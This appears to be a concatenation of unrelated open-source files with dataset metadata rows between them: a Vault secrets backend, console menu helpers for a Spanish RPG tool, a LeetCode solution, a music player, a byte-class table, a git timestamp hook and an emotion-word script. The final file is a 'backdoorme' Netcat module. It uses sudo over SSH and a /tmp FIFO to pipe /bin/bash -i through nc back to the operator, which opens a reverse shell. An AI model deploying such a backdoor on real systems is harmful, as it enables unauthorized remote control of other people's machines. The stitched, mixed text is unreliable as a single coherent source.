client.auth.ldap.login(username=os.getenv("VAULT_USERNAME"), password=os.getenv("VAULT_PASSWORD"))
elif auth_type == "userpass":
client.auth_userpass(username=os.getenv("VAULT_USERNAME"), password=os.getenv("VAULT_PASSWORD"))
elif auth_type == "approle":
client.auth_approle(os.getenv("VAULT_ROLE_ID"), secret_id=os.getenv("VAULT_SECRET_ID"))
elif auth_type == "github":
client.auth.github.login(token=env["token"])
else:
raise "Authentication type '{auth}' not supported".format(auth=auth_type)
if client.is_authenticated():
return client
else:
raise VaultError("Vault Authentication Error, Environment Variables defined?")
class VaultSecret(Base64Ref):
"""
Hashicorp Vault support for KV Secret Engine
"""
def __init__(self, data, vault_params, **kwargs):
"""
Set vault parameter and encoding of data
"""
self.data = data
self.vault_params = vault_params
super().__init__(self.data, **kwargs)
self.type_name = "vaultkv"
@classmethod
def from_params(cls, data, ref_params):
"""
Return new VaultSecret from data and ref_params: target_name
parameters will be grabbed from the inventory via target_name
"""
try:
target_name = ref_params.kwargs["target_name"]
if target_name is None:
raise ValueError("target_name not set")
target_inv = cached.inv["nodes"].get(target_name, None)
if target_inv is None:
raise ValueError("target_inv not set")
ref_params.kwargs["vault_params"] = target_inv["parameters"]["kapitan"]["secrets"]["vaultkv"]
return cls(data, **ref_params.kwargs)
except KeyError:
raise RefError("Could not create VaultSecret: vaultkv parameters missing")
@classmethod
def from_path(cls, ref_full_path, **kwargs):
return super().from_path(ref_full_path, encrypt=False, **kwargs)
def reveal(self):
"""
Returns decrypted data
"""
# can't use super().reveal() as we want bytes
try:
self.data = base64.b64decode(self.data, validate=True)
except b_error:
exit("non-alphabet characters in the data")
return self._decrypt()
def _decrypt(self):
"""
Authenticate with Vault server & returns value of the key from secret
:returns: secret in plain text
"""
try:
client = vault_obj(self.vault_params)
            # the token comprises two parts: path_in_vault:key
data = self.data.decode("utf-8").rstrip().split(":")
return_data = ""
if self.vault_params.get("engine") == "kv":
response = client.secrets.kv.v1.read_secret(
path=data[0], mount_point=self.vault_params.get("mount", "secret")
)
return_data = response["data"][data[1]]
else:
response = client.secrets.kv.v2.read_secret_version(
path=data[0], mount_point=self.vault_params.get("mount", "secret")
)
return_data = response["data"]["data"][data[1]]
client.adapter.close()
except Forbidden:
raise VaultError(
"Permission Denied. "
+ "make sure the token is authorised to access {path} on Vault".format(path=data[0])
)
except InvalidPath:
raise VaultError("{path} does not exist on Vault secret".format(path=data[0]))
if return_data == "":
raise VaultError("'{key}' doesn't exist on '{path}'".format(key=data[1], path=data[0]))
return return_data
def dump(self):
"""
Returns dict with keys/values to be serialised.
"""
return {
"data": self.data,
"encoding": self.encoding,
"type": self.type_name,
"vault_params": self.vault_params,
}
class VaultBackend(Base64RefBackend):
def __init__(self, path, ref_type=VaultSecret, **ref_kwargs):
"init VaultBackend ref backend type"
super().__init__(path, ref_type, **ref_kwargs)
self.type_name = "vaultkv"
|
apache-2.0
| 3,772,391,026,941,438,000
| 38.480349
| 128
| 0.619843
| false
| 3.937718
| false
| false
| false
|
zenieldanaku/pygpj
|
func/core/viz.py
|
1
|
6108
|
# coding=UTF-8
# Viz.py
import os
from math import ceil
from func.core.lang import t, probar_input
def PrepPrint(lista):
imp = ''
lineas = []
for elemento in lista:
imp += str(elemento)+', '
if len(imp) > 75:
lineas.append(imp)
imp = ''
lineas.append(imp)
imprimir = '\n'.join(lineas).rstrip(', ')+'.'
return imprimir
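# Hedged usage sketch: items are joined with ', ', wrapped to ~75-character
# lines, and terminated with a full stop.
#   PrepPrint(['sword', 'shield', 'potion'])  # -> 'sword, shield, potion.'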
def subselector (prompt,lista,vueltas=1,dos_col=False):
from func.core.config import advt as advertencias
items = []
pool = vueltas
    copia = lista * 1  # working copy
for vuelta in range(vueltas):
if vuelta == 0:
paginado = []
for i in range(len(copia)):
if copia[i][0:1] == '\n':
copia[i] = copia[i].strip('\n')
paginado.append('\n'+str(i)+': '+str(t(copia[i])))
else:
paginado.append(str(i)+': '+str(t(copia[i])))
if dos_col == False:
paginar (10,paginado)
else:
paginar_dos_columnas(10,paginado)
while pool > 0:
item = ''
while item == '':
item = input ('\n'+prompt+': ').capitalize()
if item.isnumeric():
item = int(item)
if item in items:
print (t('Ya ha realizado esa selección, intente nuevamente'))
item = ''
elif item not in range(len(copia)):
print(t('La selección es incorrecta, intente nuevamente'))
item = ''
else:
if advertencias == True:
print (t('Ha elegido ')+t(copia[item]),end = '. ')
items.append(item)
pool -= 1
else:
item = probar_input (item,copia)
if item == '':
print (t('La selección es incorrecta, intente nuevamente')+'\n')
elif copia.index(item) in items:
print (t('Ya ha realizado esa selección, intente nuevamente'))
item = ''
else:
if advertencias == True:
print (t('Ha elegido ')+t(item),end = '. ')
items.append(copia.index(item))
pool -= 1
if advertencias == True:
if not input(t('¿Estas seguro? ')+t('[S / N]')+' ').strip().lower().startswith(t('s')):
pool += 1
del items[-1]
if vueltas == 1:
return items[0]
else:
return items
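# Hedged usage sketch: let the user pick 2 distinct entries, by number or by
# (translated) name; with vueltas > 1 it returns a list of chosen indices.
#   subselector('Race', ['Elfo', 'Humano', 'Enano'], vueltas=2)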
def barra (caracteristicas, alineamiento, raza):
    '''Generates the top preview bar.'''
FUE = str(caracteristicas['FUE']['Punt'])
DES = str(caracteristicas['DES']['Punt'])
CON = str(caracteristicas['CON']['Punt'])
INT = str(caracteristicas['INT']['Punt'])
SAB = str(caracteristicas['SAB']['Punt'])
CAR = str(caracteristicas['CAR']['Punt'])
barra = ' | '.join([raza,' '.join([t('FUE'),FUE,t('DES'),DES,t('CON'),CON,
t('INT'),INT,t('SAB'),SAB,t('CAR'),CAR]),
'Al '+alineamiento])
return barra
def paginar (tam_pag,lineas):
    '''Simple function to display lines of text in pages.'''
for i in range(len(lineas)):
if i == 0:
print()
print (lineas[i])
if lineas[i] != lineas[-1]:
if (i+1) % tam_pag == 0:
                input ('\n[Press Enter to continue]\n')
#os.system(['clear','cls'][os.name == 'nt'])
def a_dos_columnas(items):
    '''Splits a list of items into two columns so they fit on a single page.'''
c1 = []
c2 = []
for i in range(len(items)):
if i < len(items)/2:
c1.append(items[i])
else:
c2.append(items[i])
if len(c1) > len(c2):
for i in range(len(c1)-len(c2)):
c2.append('')
lineas = []
for i in range(len(c1)):
if len(c1[i]) > 32:
lineas.append(c1[i] +'\t'+ c2[i])
elif len(c1[i]) > 23:
lineas.append(c1[i] +'\t'*2+ c2[i])
elif len(c1[i]) > 15:
lineas.append(c1[i] +'\t'*3+ c2[i])
elif len(c1[i]) > 7:
lineas.append(c1[i] +'\t'*4+ c2[i])
else:
lineas.append(c1[i] +'\t'*5+ c2[i])
return lineas
def paginar_dos_columnas(tam_pag,lista):
pags = ceil((len(lista)/2)/tam_pag)
c1 = [[] for i in range(pags)]
c2 = [[] for i in range(pags)]
j = 0
for i in range(len(lista)):
if i == tam_pag*2*(j+1):
j += 1
if i < tam_pag+(tam_pag*2)*j:
c1[j].append(lista[i])
else:
c2[j].append(lista[i])
if len(c1[-1]) > len(c2[-1]):
for i in range(len(c1[-1])-len(c2[-1])):
c2[-1].append('')
lineas = []
for i in range(pags):
for j in range(len(c1[i])):
if len(c1[i][j]) > 31:
lineas.append(c1[i][j] +'\t'+ c2[i][j])
elif len(c1[i][j]) > 23:
lineas.append(c1[i][j] +'\t'*2+ c2[i][j])
elif len(c1[i][j]) > 15:
lineas.append(c1[i][j] +'\t'*3+ c2[i][j])
elif len(c1[i][j]) > 7:
lineas.append(c1[i][j] +'\t'*4+ c2[i][j])
else:
lineas.append(c1[i][j] +'\t'*5+ c2[i][j])
for i in range(len(lineas)):
if i == 0:
print()
print (lineas[i])
if lineas[i] != lineas[-1]:
if (i+1) % tam_pag == 0:
                input ('\n[Press Enter to continue]\n')
#os.system(['clear','cls'][os.name == 'nt'])
|
mit
| 1,342,281,639,521,813,200
| 32.659091
| 103
| 0.430984
| false
| 3.290183
| false
| false
| false
|
vivaxy/algorithms
|
python/problems/most_common_word.py
|
1
|
1131
|
"""
https://leetcode.com/problems/most-common-word/
https://leetcode.com/submissions/detail/150204402/
"""
class Solution:
def mostCommonWord(self, paragraph, banned):
"""
:type paragraph: str
:type banned: List[str]
:rtype: str
"""
wordAcc = dict()
for word in paragraph.lower().replace(',', '').replace('.', '').replace('!', '').replace('?', '').replace('\'', '').replace(';', '').split(' '):
if word not in banned:
if word in wordAcc:
wordAcc[word] += 1
else:
wordAcc[word] = 1
maxCount = 0
ans = ''
for word in wordAcc:
count = wordAcc[word]
if count > maxCount:
maxCount = count
ans = word
return ans
import unittest
class Test(unittest.TestCase):
def test(self):
solution = Solution()
self.assertEqual(solution.mostCommonWord(
'Bob hit a ball, the hit BALL flew far after it was hit.', ['hit']), 'ball')
if __name__ == '__main__':
unittest.main()
|
mit
| -3,210,401,791,503,412,000
| 24.704545
| 152
| 0.505747
| false
| 4.097826
| true
| false
| false
|
hanxi/pyfm
|
pyfm.py
|
1
|
2766
|
#!/usr/bin/python
# coding: utf-8
import sys
import os
import threading
import time
import random
import json
import signal
import gst
# Base class
class MusicBase:
def __init__(self):
self.app_name = 'console_fm'
self.appPath = os.path.realpath(sys.path[0])
jsonStr = open(self.appPath+'/music2type.json').read()
self.music2type = json.loads(jsonStr)
noneType = []
for k in self.music2type.keys():
if len(self.music2type[k])==0:
noneType.append(k)
for v in noneType:
del self.music2type[v]
self.player = gst.element_factory_make('playbin', 'player')
self.event = threading.Event()
self.playing = False
        self.next()
bus = self.player.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_message)
    # gst message handling
def on_message(self, bus, message):
if message.type == gst.MESSAGE_EOS:
            self.next()
    # Main thread function: the playback loop
def mainloop(self):
while True:
#print self.title,self.url
self.player.set_property('uri', self.url)
self.player.set_state(gst.STATE_PLAYING)
self.playing = True
            # put the thread into a wait state until it is signalled to continue
self.event.wait()
self.event.clear()
    # Play/pause
def pause(self):
if self.playing:
self.player.set_state(gst.STATE_PAUSED)
self.playing = False
            print 'Paused'
else:
self.player.set_state(gst.STATE_PLAYING)
self.playing = True
            print 'Resumed'
    # Next track
def next(self):
self.player.set_state(gst.STATE_NULL)
self.event.set()
key = random.choice(self.music2type.keys())
self.title = random.choice(self.music2type[key].keys())
self.url = self.music2type[key][self.title]
print "播放:",self.title
    # Start the main playback thread
def run(self):
self.thread = threading.Thread(target=self.mainloop)
self.thread.setDaemon(True)
self.thread.start()
while True:
if not self.thread.isAlive(): break
    # Destroy the player; no clean way to stop the playback thread has been found yet
def destroy(self):
self.thread._Thread__stop()
# Main console playback interface
class MusicMainConsole():
def __init__(self):
self.fm = MusicBase()
self.fm.run()
def sigint_handler(signum, frame):
print ("exit")
sys.exit()
if __name__ == '__main__':
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigint_handler)
random.seed(time.time())
MusicMainConsole()
|
mit
| 7,971,246,647,054,509,000
| 25.02
| 67
| 0.577633
| false
| 3.008092
| false
| false
| false
|
wittrup/crap
|
python/encoding.py
|
1
|
1363
|
N = 0 # character never appears in text
A = 1 # character appears in plain ASCII text
I = 2 # character appears in ISO-8859 text
X = 3 # character appears in non-ISO extended ASCII (Mac, IBM PC)
text_chars = [
# BEL BS HT LF VT FF CR
N, N, N, N, N, N, N, A, A, A, A, A, A, A, N, N, # 0x0X
# ESC
N, N, N, N, N, N, N, N, N, N, N, A, N, N, N, N, # 0x1X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x2X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x3X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x4X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x5X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, # 0x6X
A, A, A, A, A, A, A, A, A, A, A, A, A, A, A, N, # 0x7X
# NEL
X, X, X, X, X, A, X, X, X, X, X, X, X, X, X, X, # 0x8X
X, X, X, X, X, X, X, X, X, X, X, X, X, X, X, X, # 0x9X
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xaX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xbX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xcX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xdX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, # 0xeX
I, I, I, I, I, I, I, I, I, I, I, I, I, I, I, I # 0xfX
]
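# Hedged example (an addition, not part of the original table): report the
# most permissive character class needed for a byte string, in the spirit
# of file(1)'s text heuristic.
def max_char_class(data):
    """Return N, A, I or X for the bytes in `data` (N for empty input)."""
    return max((text_chars[b] for b in data), default=N)
# e.g. max_char_class(b'hello\n') == A and max_char_class(b'caf\xe9') == I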
if __name__ == '__main__':
print('\n'.join(str(text_chars[i:i+16]) for i in range(0, len(text_chars), 16)))
|
mit
| -1,026,429,806,372,490,800
| 44.466667
| 81
| 0.405723
| false
| 1.72096
| false
| false
| false
|
elationfoundation/git_hooks
|
pre-commit/python/timestamp.py
|
1
|
1631
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import subprocess
from datetime import datetime
class TestSuite():
def __init__(self):
self.stdout = 0
def run(self, files):
for file_name in files:
try:
self.set_changed(file_name)
except Exception as _ee:
print(_ee)
print("Completed time stamping")
return 0
def system(self, *args, **kwargs):
kwargs.setdefault('stdout', subprocess.PIPE)
proc = subprocess.Popen(args, **kwargs)
out, err = proc.communicate()
return out
def current_time(self):
"""Current date-time"""
return datetime.now().strftime('%Y-%m-%d %H:%M')
def set_changed(self, file_name):
# watching python and lua scripts
if re.search(r"(\.py|\.lua)$", file_name):
# current script text
with open(file_name, 'r') as fd: script = fd.read()
# change modification date
try:
_now = self.current_time()
print(_now)
script = re.sub('(@changed\s*:\s+)\d{4}-\d{2}-\d{2} \d{2}:\d{2}', lambda m: m.group(1) + _now, script)
except Exception as __ee:
print(__ee)
# write back to script
with open(file_name, 'w') as fd: fd.write(script)
# add changes to commit
try:
print(file_name+"'s timestamp updated")
self.system('git', 'add', file_name)
except Exception as _ee:
print(_ee)
return 0
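# Hedged usage sketch (an addition, not part of the original hook): stamp an
# explicit file list instead of the staged files a pre-commit hook would pass.
if __name__ == '__main__':
    import sys
    TestSuite().run(sys.argv[1:])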
|
gpl-2.0
| 188,132,529,603,103,600
| 30.365385
| 118
| 0.505825
| false
| 3.949153
| false
| false
| false
|
Weihonghao/ECM
|
find_emotion_word.py
|
1
|
1493
|
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
from tqdm import tqdm
import mmap
def whetherEmotion(word, threshold):
analyzer = SentimentIntensityAnalyzer()
sentiment_result = analyzer.polarity_scores(word)
if abs(sentiment_result['compound']) > threshold:
return True
return False
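# Hedged usage sketch: with the 0.5 threshold used below, strongly polarised
# words pass while neutral ones do not (exact scores depend on the installed
# VADER lexicon).
#   whetherEmotion('wonderful', 0.5)  # True
#   whetherEmotion('table', 0.5)      # False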
def get_line_number(file_path):
fp = open(file_path, "r+")
buf = mmap.mmap(fp.fileno(), 0)
lines = 0
while buf.readline():
lines += 1
return lines
if __name__ == '__main__':
threshold = 0.5
out = open("/commuter/chatbot/Commuter/data/emotion_vocab.txt",'w')
emotion_word_set = set()
line_number = get_line_number('/commuter/chatbot/Commuter/question.txt')
print(line_number)
f = open("/commuter/chatbot/Commuter/question.txt",'r')
for line in tqdm(f, total=line_number):#f.readlines():
line = line.strip().split()
for each in line:
if whetherEmotion(each, threshold):
emotion_word_set.add(each)
f.close()
#emotion_word_set = set()
f = open("/commuter/chatbot/Commuter/answer.txt",'r')
for line in tqdm(f, total=line_number):#f.readlines():
'''line = line.strip()
if whetherEmotion(line, threshold):
emotion_word_set.add(line)'''
line = line.strip().split()
for each in line:
if whetherEmotion(each, threshold):
emotion_word_set.add(each)
f.close()
for each in emotion_word_set:
out.write(each)
out.write("\n")
out.close()
|
agpl-3.0
| 8,073,913,267,619,536,000
| 30.104167
| 73
| 0.653048
| false
| 3.05317
| false
| false
| false
|
Kkevsterrr/backdoorme
|
backdoors/shell/netcat.py
|
1
|
1739
|
from backdoors.backdoor import *
import time
class Netcat(Backdoor):
prompt = Fore.RED + "(nc) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using netcat backdoor..."
self.core = core
self.options = {
"port" : Option("port", 53920, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "Uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell."
def get_command(self):
#command = "echo " + self.core.curtarget.pword + " | sudo -S bash -c \"cat /tmp/f | /bin/bash -i 2>&1 | nc " + self.core.localIP + " %s > /tmp/f\"" % self.get_value("port")
command = "cat /tmp/f | /bin/bash -i 2>&1 | nc " + self.core.localIP + " %s > /tmp/f" % self.get_value("port")
return command
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
self.listen(prompt="some")
#input("Enter the following command in another terminal: nc -v -n -l -p %s" % port)
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command("echo " + target.pword + " | sudo -S rm /tmp/f")
time.sleep(.5)
target.ssh.exec_command("mkfifo /tmp/f")
#target.ssh.exec_command("echo " + target.pword + " | sudo -S chmod 222 /tmp/f")
target.ssh.exec_command(self.get_command())
print(GOOD + "Netcat backdoor on port %s attempted." % port)
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
mit
| 8,729,828,714,688,870,000
| 44.763158
| 180
| 0.564117
| false
| 3.331418
| false
| false
| false
|